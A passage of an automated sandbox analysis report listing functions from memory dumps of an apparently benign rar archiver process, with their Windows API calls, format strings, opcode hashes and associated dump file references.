                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                                                                                      • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                                                                                      • API String ID: 233258989-622958660
                                                                                                                                                                                                                                      • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                      • Instruction ID: 3a8dfd42db4aba25be7ef4b05563d6fbad61a9486a60084b65a4c17a82025909
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD5138F3F386548AE3648F1CE881BA93690F364F90F545B68F94AD3B44DA3DDA458B01
                                                                                                                                                                                                                                      Function 00007FF69A3F6E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcschr
                                                                                                                                                                                                                                      • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                                                                                      • API String ID: 1497570035-1725859250
                                                                                                                                                                                                                                      • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                      • Instruction ID: f56d160d49e7eb52fa36607b510daa4d7916d14a5ada7e50f750f80fa847c6c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8416A12D1C6C380FA309F20855157E72D1EF10BC4F5984FEEE5DCA2D6EE2DA552A321
                                                                                                                                                                                                                                      Function 00007FF69A403528 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00007FF69A40359E
                                                                                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF69A4035E6
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A4030C8: GetFileAttributesW.KERNELBASE(00000800,00007FF69A40305D,?,?,?,?,?,?,?,?,00007FF69A414126,?,?,?,?,00000800), ref: 00007FF69A4030F0
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A4030C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF69A414126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF69A403119
                                                                                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF69A403651
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                                                                                      • String ID: %u.%03u
                                                                                                                                                                                                                                      • API String ID: 2814246642-1114938957
                                                                                                                                                                                                                                      • Opcode ID: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                      • Instruction ID: 959cf6748932b9bcc87e6c89983c546f61c59751ad7a437da7bb43d27d9fb941
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB31366161868142E7349B25E4112BA76E0FB94BB4F5017B6EE7EC7BE1DF3DE4068700
                                                                                                                                                                                                                                      Function 00007FF69A447854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                      • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                      • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                                      • Instruction ID: 1fa536cb75e36869b96c766464208a8d23ec853ead62a6548deef027c836fd53
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA418E32B19A4186EB608F25E8443AAB7E1FB88B94F4140B1EE8DC7794DF3CD512C740
                                                                                                                                                                                                                                      Function 00007FF69A43D7BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                      • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                                      • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                                      • Instruction ID: 3b89547a7b736092cd53d6fc16571534fced4bbe4f413abd42267b38b4682f97
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85215C7A60864182E734DB16E14026E77A1FB88FA5F0016B5DEDD83B95CF3CE886CB00
                                                                                                                                                                                                                                      Function 00007FF69A4142CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcschr$swprintf
                                                                                                                                                                                                                                      • String ID: %c:\
                                                                                                                                                                                                                                      • API String ID: 1303626722-3142399695
                                                                                                                                                                                                                                      • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                                      • Instruction ID: c655713ed7da1bb1fd2380775ad617502a94988c326ca18482a9217cd11efa44
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70118E62B1874581EE346F11950107973A0EF66F90B1895F5DFAE877E6EF3CE4618340
                                                                                                                                                                                                                                      Function 00007FF69A42B780 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                                                      • String ID: Thread pool initialization failed.
                                                                                                                                                                                                                                      • API String ID: 3340455307-2182114853
                                                                                                                                                                                                                                      • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                                      • Instruction ID: 56b714c3b29ca1a08d6d08754e4ca0973e168354e299c82fd0bfc244b6ab7574
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C911E632B1568186FB608F25E4143AA32E2EBC4F98F1884B9DA4D87659CF3DD4568740
                                                                                                                                                                                                                                      Function 00007FF69A432984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 904936192-0
                                                                                                                                                                                                                                      • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                      • Instruction ID: 0eda1bee7b88970e8a952dc9bb775b7592f4c92559ad9500a166a65744986c0f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB51DE62A19A8182EB60CF25D4503AC73A1FBD4F98F0482B1DEAEC77A5DF79D512C300
                                                                                                                                                                                                                                      Function 00007FF69A403818 Relevance: 6.1, APIs: 4, Instructions: 129filetimeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF69A3FF6FC,00000000,?,?,?,?,00007FF69A40097D), ref: 00007FF69A4038CD
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,00007FF69A3FF6FC,00000000,?,?,?,?,00007FF69A40097D,?,?,00000000), ref: 00007FF69A40391F
                                                                                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00007FF69A3FF6FC,00000000,?,?,?,?,00007FF69A40097D,?,?,00000000), ref: 00007FF69A40399B
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00007FF69A3FF6FC,00000000,?,?,?,?,00007FF69A40097D,?,?,00000000), ref: 00007FF69A4039A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2287278272-0
                                                                                                                                                                                                                                      • Opcode ID: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                                      • Instruction ID: aede8d82f815d2aec386b3dc276ad4a58f1c6e61c7cfbff955ceb3b66f0aaaea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D441C326A0D65142EB708B21A51177A7AE0FF95FA4F1142F1EE9D877D4DF7CE40A8B00
                                                                                                                                                                                                                                      Function 00007FF69A430244 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 932687459-0
                                                                                                                                                                                                                                      • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                      • Instruction ID: 41931f43ad024750ca9b242af69bc469ca8df1c3b2968da8acc8decd74d6080b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0416162A0DAC285EB719A21D2503FD73D0EF90F84F1846F6DBCD86A99DF2CE9458311
                                                                                                                                                                                                                                      Function 00007FF69A445120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
